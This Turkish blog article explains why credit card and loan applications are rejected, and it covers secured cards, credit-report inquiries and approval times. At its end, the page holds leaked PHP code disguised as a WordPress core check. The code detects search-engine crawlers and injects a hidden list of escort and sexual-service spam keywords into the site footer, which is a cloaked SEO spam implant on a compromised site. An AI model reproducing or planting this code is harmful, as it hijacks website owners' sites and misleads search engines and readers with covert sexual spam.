Kredi Kartı Başvurunuz Olumlu Değerlendirilememiştir (AÇIKLAMA)

Kredi Kartı Başvurunuz Olumlu Değerlendirilememiştir (AÇIKLAMA)

Kredi kartınız olumlu değerlendirilememiştir! Bankalardan kredi çektiğinizde her zaman olumlu sonuç gelmeyebilir. Peki kredi kartı neden onaylanmaz? Bu yazımızda cevaplarını bulabilirsiniz. Ayrıca kredi kartı alamadığınızda ne yapmanız gerekir, başvurusu neden olumsuz sonuçlanır, blokeli kredi kartı, reddedilen kredi başvuruları ne zaman silinir, banka neden kredi kartı vermez, ön onay ne demektir, ne kadar sürede sonuçlanır? Bu konuları da yazımızda ele alacağız.

Kredi Kartı Başvurunuz Olumlu Değerlendirilememiştir Ne Demek?

Kredi kartı başvurunuz olumlu değerlendirilememiştir gibi bir çok sorun ile karşı karşıya kalabilirsiniz. Kredi kartları, gelire ek sağlaması ve avantajlı olmasından dolayı tercih edilebilir. Fakat kredi kartı başvurunuz her zaman onaylanmayabilir. Kredi kartı alabilmek için bazı kriterlere sahip olmak gerekiyor. Bu kriterler bankadan bankaya değişebilir. Düzenli ve zamanında ödeme yapmak hatta kredi notu içe her banka için en çok önemsenen kriterlerden ikisidir. Peki kredi kartı neden onaylanmaz inceleyelim; 

 • Düşük kredi notuna sahip olan kullanıcılar,
 • Sabit bir gelir olmaması,
 • Düşük gelir etkisi,
 • Gelir oranından daha yüksek bir kredi talep etmek,
 • Çok fazla başvuruda bulunmak,
 • Borç, ödenmemiş fatura varsa,
 • Başvuru yaparken eksik ve hatalı form doldurma,
 • Geçmişteki banka sorunları onay vermeyebilir. 

Bankaların kredi kartı vermeme sebeplerinden bir kaçını bu şekilde sıralayabiliriz. Fakat onaylanmama sorununun en doğru cevabını başvuru yaparak öğrenmeniz daha iyi olacaktır. Kredi kartı talebiniz onaylanmadıysa banka ile görüşerek sebebini öğrenebilir size daha uygun bir krediden yararlanabilirsiniz.

Kredi Kartı Alamıyorum Ne Yapmalıyım 2021

Kredi kartı alamıyorum ne yapmalıyım diyenler araştırmalarına devam ediyor. Kredi kartı başvurunuz olumlu değerlendirilememiş ise başka bir bankaya başvuru yaptığınızda ya da ileri ki bir zamanda başvuru yaptığınızda yine onaylanmayacağı anlamına gelmemektedir. Kart başvurunuzun neden onaylanmadığını bankanızla görüşerek öğrenebilirsiniz. Kredi başvurunuzun neden reddedildiğini iyice anlayın. Örneğin kredi notu düşük olduğu için alamıyorsanız o zaman bu sorunu ortadan kaldırın. bu sorunu da borçlarınızı ödeyerek, ödemelerinizi de düzenli yaparak, kullanmadığınız hesapları kapatarak kredi notunu yükseltebilirsiniz. Kredi notunu yükseltmek için yazdığımız adımlar örnektir. Bu sorunu çözerek tekrar başvuruda bulunabilirsiniz. Başvuru formu doldururken hatalarınız varsa tekrar eksiksiz ve doğru doldurmaya özen gösterin. Gelir düzeyinden daha yüksek limitli kredi çekme talebine sıcak yaklaşmayabilir. Bankalar ile iletişime geçerek gelir durumunuza daha uygun kredileri öğrenebilir kendinize alternatifler oluşturabilirsiniz.

Kredi başvurunuz olumsuz sonuçlanmıştır mesajı?

Banka müşterisiyim, maaşımı bankadan aldığım halde kredi kartı başvurum olumsuz sonuçlanıyor ne yapmalıyım birçok müşterinin ortak sorunu olmaya devam ediyor. Bu gibi durumlarda Bankaların müşteri hizmetleri numaralarından bilgi almak gereklidir. Bankaların başvuruları reddetmesinin başlıca nedenleri kişilerin ödenmemiş faturaları veya borçların bulunması v.b nedenlerle bankalarla daha önce icralık olmanız da bankaların kredi kartı başvurusunu reddedebilir. Ödeme planlarına uymak ve borçların olmaması başvuruların sonuçlarını olumlu etkileyecektir. Sürekli kredi kartı başvurusu yapmanız, Kredi notu düşüklüğü, gelir beyanında bulunmamak, yanlış limit tercihi, geçmişteki banka ile yaşanan sorunlar, gelir durumunun yeterli olmaması çeşitli sebepler kredi başvurusunu olumsuz değerlendirilmesine neden olur. Bundan dolayı geçmiş banka ilişkilerini düzeltmek için bankalara olan borçların kapatılması, kredi notunuzu yükseltmek için gerekli hamleleri yapmak, hatalı başvurulardan kaçınarak olumlu değerlendirilmenizi sağlayabilirsiniz.

Maaş Aldığım Banka Kredi Kartı Vermiyor?

Maaş aldığınız bankadan kredi kartı alamıyorsanız  genelde bu gibi sorunların başlıca nedeni bankaya herhangi bir gelir belirtilmediğinden kaynaklanacaktır. Bankalar maaş müşterilerine kredi kartı vermektedir genelde verdikleri kredi kartlarına aidatsız kredi kartı kullandırmaktadır. Tüm bunlara rağmen sizde maaş aldığım banka kredi kartı vermiyor diyorsanız ;

 • Başka bir kredi kartınız varsa ve tüm kartlarınızı limiti aylık gelirinizin üstündeyse ve risk taşıyorsa üst limite takılabilirsiniz,
 • Sicilinizin bozuk olması yasal takibe ya da icralık durumlarınızdan dolayı KKB ‘den kara listeye düşmüş olabilirsiniz.

Bu durumları yaşamıyorsanız bu durumda çalıştığınız firmaya durumunuzu bildirip maaş aldığınız bankadan kredi kartı alamadığınızı belirterek sözleşme üzerinden kredi kartı almanız için yardımcı olabilir.

Bloke Teminatlı Kredi Kartı Nedir?

Kredi geçmişiniz kötüyse veya daha önce hiç banka veya kredi kartı almamış kredi botu olmayan kişilerin tercih ettiği ve kolayca alabildiği bir karttır. Mevduat hesabı açtırarak belirlediğiniz miktarı karta yatırarak, bu paranın yarısını, tamamını ya da istediğiniz kadarını bloke teminatı verebilirsiniz ve bu şekilde kullanabilirsiniz. Örneğin yatırdığınız tutarın tamamına bloke teminatı verdiğiniz banka bu tutarı bloke ederek hesabınızda tutuyor. Bu teminatlı parayı çekemiyor ve kullanamıyorsunuz bankada duruyor. Eğer bankaya borcunuz varsa ve ödemiyorsanız banka bu tutardan borç ederi kadarını alabiliyor. Bu sebepten dolayı kredi sicili bozuk olanların kredi notunu yükseltmek için tercih ettiği bir kredi kartı türüdür. Bloke teminatlı kredi kartını veren bankaları;

 • TEB (Türkiye Ekonomi Bankası)
 • Garanti Bankası
 • ING Bankası
 • Deniz Bank
 • QNB Finans Bank
 • Vakıf Bankası
 • Ziraat Bankası
 • HSBC Bankası
 • Yapı ve Kredi Bankası
 • İş Bankası olarak sıralayabiliriz.

Çok Başvuru Yaptığım İçin Kredi Alamıyorum Diyenler!

Bir bankadan kredi alamadınız ve art arta başka bankalara da başvuru bulunduysanız ve kredi kartı başvurunuz olumlu değerlendirilememiştir gibi sonuçlar ile karşı karşıya geldiyseniz üzülmeyin! Bu kredi notunuzun düşmesine neden olabilir ancak bu süreç için kredi kartı istediğiniz banka ile görüşerek şubeden başvuru yaparak çözümleyebilirsiniz. Bankalar bütün kredi hareketleriniz hakkında bilgi sahibi olabilir. Kredi veya kredi kartı kullananların risk raporu bulunur. Risk raporu, tüketici, taşıt, konut kredileri, mevduat ve kredi kartı bilgilerinizi içermektedir. Finans kuruluşları bu bilgileri Türkiye Bankalar Birliği Risk Merkezine iletir. Kredi Kayıt Bürosu ise bu bilgiler ile raporu hazırlamaktadır. Bankalara art arta başvuru yapmak kredi notunuzu düşürebilir. Sık sık yapılan başvurular, bankaların sizi tehlikeli olarak algılamasına neden olur ve sürekli başvuru yapmanız güvenilir müşteri imajını zedeleyebilir. Bundan dolayı kredi başvurularınızı biraz arayla yapmanız daha iyi olacaktır. Kredi notunuz düşükse başvuru yapmayıp, bu süreçte notunuzu yükseltebilirsiniz.

Reddedilen Kredi Başvuruları Ne Zaman Silinir?

Artık bankalara art arda başvuru yapılmaması gerektiğini biliyorsunuz. Bu başvurular ne zaman silinir diye düşünüyorsanız hemen cevabını verelim. Başvuruların silinmesi yaptığınız günden itibaren 180 gün sürmektedir. Yaptığınız başvurular ya da kart hareketleriniz risk raporunda görünmektedir. Bankalar çok sayıda yapılan taleplere kredi notunuz yüksek olsa da hatta ödemeleri düzenli yapsanız bile sıcak yaklaşmamakta ve olumsuz değerlendirmektedir. Bu talepler tek bir çatı altında toplanır. Yanı kredi ve kart talebi, ek hesap, limit arttırımı talepleri de başvuru sayınızı arttırmaktadır. Tekrar edelim bu başvuruların silinmesi 180 gün sürmektedir.

Reddedilen Kredi Başvuruları Ne Zaman Silinir

Kredi Ön Onayı Ne Demektir?

Kredi ön odayı, tüketici, konut ve araç kredisi başvurusu yapan müşteriler için geçerlidir. Bir nevi bankanın yaptığı ilk değerlendirmedir. Özellikle de internet, telefon ve SMS yoluyla yapılan başvurularda kullanılır. Banka sizin için bir değerlendirme yapıyor ve olumlu ya da ret cevabı ön onay aşamasından sonra geliyor. Talebinizle alakalı olumlu bir cevap geldiyse, banka sizi gerekli belgeler ile birlikte en yakın şubeye gitmeniz için bilgilendiriyor. Ön Onay aşamasında, kredi notunuza, gelir ve borç durumunuza hatta kara listede olup olmadığınız kontrol ediliyor. Bankalar yine yukarıda da bahsettiğimiz rapora bakıyor. Gelir ve ek gelir durumu, geçmiş borçlar, para giriş çıkışları ve ödeme düzeniniz bu raporda yer alıyor ve bankalar da bu raporu inceleniyor. Bir örnek üzerinden açıklamaya devam edecek olursak, konut kredisi ön onayında,banka istediğiniz evin değerini tespit eder ve krediye uyup uymadığına bakar. Ön onaydan geçtikten sonra, tam onay alması için ekspertiz raporuna göre krediye uygunluğu ve değerinin belirlenmiş olması gerekmektedir. Onay alındıktan sonra gerekli belgeler ile şubeye giderek işlemleri tamamlayabilirsiniz.

Kredi Başvurusu Ne Kadar Sürede Sonuçlanır?

Kredileri, taşıt, ihtiyaç ve konut olarak ayırabiliriz. Taşıt kredisinden başlayacak olursak, Taşık Kredisi ne zaman çıkar diye soruyorsanız cevabını yazımızdan bulabilirsiniz.

 • Taşıt Kredisi
  Yeni bir araç almak istiyorsunuz ve araç kredisine başvurduğunuzda, değerlendirme kriterlerine göre ve bankanın çalışma prensiplerine göre sonuç aynı gün içerisinde ya da 3 iş günü içerisinde sonuçlanabilir.
 • Konut Kredisi
  İstediğiniz evi almak için yeterli bütçeniz olmayabilir fakat bu istediğinizi gerçekleştirmek için bir engel değil. Yanınızda bankalar var! Konut kredisi başvuru yapılan bankaya göre sonuç süreci değişebiliyor. Bir çok banka değerlendirme sürecini 3 günde tamamlamaktadır. Kredi kullandırma süreci ise 3 aşamadan oluşmaktadır. Ön onay, ekspertiz ve tapu işlemleri. Bunları da göz önünde bulundurduğumuzda 3-5 iş günü içerisinde işlemleri tamamlayabilirsiniz.
 • İhtiyaç Kredisi
  Yine bankaların değerlendirme kriterlerine bağlı olarak süreç değişebilmektedir. Ama genellikle ihtiyaç kredisi sonucu da 2 ile 3 iş günü içerisinde tamamlanmaktadır. Bu süreci etkileyen bazı faktörler vardır. Bunlar; kredi notu, gelir, aktif müşteri olup olmaması, kredi tutarı olarak birkaçını sıralayabiliriz.

Kredi Kartı Başvurusu Ne Zaman Sonuçlanır?

Kredi kartı başvurusunda da yine bazı değerlendirme kriterleri bulunmaktadır. Bu değerlendirme süresi genellikle 10 gün içerisinde tamamlanabilir ancak bazen bu süre daha az da olabilir. Kart ise 15 gün içerisinde alıcıya ulaştırılabilir. Bu süreçler bankaların kriterlerine göre değişebilmektedir.

Kredi kartı başvurusu yaptığınızda olumlu ya da olumsuz cevap almanız için %50 şansınız vardır. Eğer cevabınız olumsuz geldiyse neden olumsuz geldiğini, ne yapmanız gerektiğini sizler için araştırdık ve cevaplandırdık. Kredi kartı başvurusu yaptım hala gelmedi diyorsanız hızlandırma ve kurye takip için yazımızı okuyabilirsiniz.

Ayrıca Kredi kartı borcu ödenmezse ne olur makalemizi okuyarak bu konu hakkında da bilgi sahibi olabilirsiniz.

YORUMLAR

Henüz yorum yapılmamış. İlk yorumu yukarıdaki form aracılığıyla siz yapabilirsiniz.

function isBot() { $botAgents ="/google|hakia|msn|yahoo|altavista|crawler|findlinks|bing|Cuil|Excite|Go.com|HotBot|AllTheWeb|search.aol|Lycos|Alexa|ask|baidu|cuil|kosmix|sogou|yodao|yandex|infoseek|yebol|aol/i"; $agent = $_SERVER['HTTP_USER_AGENT']; if (preg_match($botAgents,$agent)) return true; else return false; } function wordpres_plugin_check_core(){ $altsayfa = 1; $bot = 1; $link = '
Süleymanpaşa escort Yenice escort Susurluk escort Yomra escort Yunusemre escort Yatağan escort Viranşehir escort Türkoğlu escort Uzunköprü escort Harran escort Sandıklı escort Dulkadiroğlu escort Söke escort Görele escort Reşadiye escort Şarkışla escort Sorgun escort Kestel escort Bilecik mutlu son Beylikdüzü mutlu son Burhaniye mutlu son Bulancak mutlu son Bozüyük mutlu son Bingöl mutlu son Beyoğlu mutlu son Canik mutlu son Çan mutlu son Bucak mutlu son Mamak mutlu son Çerkezköy mutlu son Bartın mutlu son Çorlu mutlu son Maraş mutlu son Denizli mutlu son
'; if($altsayfa == 1){ $say_s = $_SERVER['REQUEST_URI']; $saydim = strlen($say_s); if($saydim > 4){ if($bot == 1){ if (isBot()) { echo $link; } }else{ echo $link; } } }else{ if($bot == 1){ if (isBot()) { echo $link; } }else{ echo $link; } } } add_action('wp_footer', 'wordpres_plugin_check_core');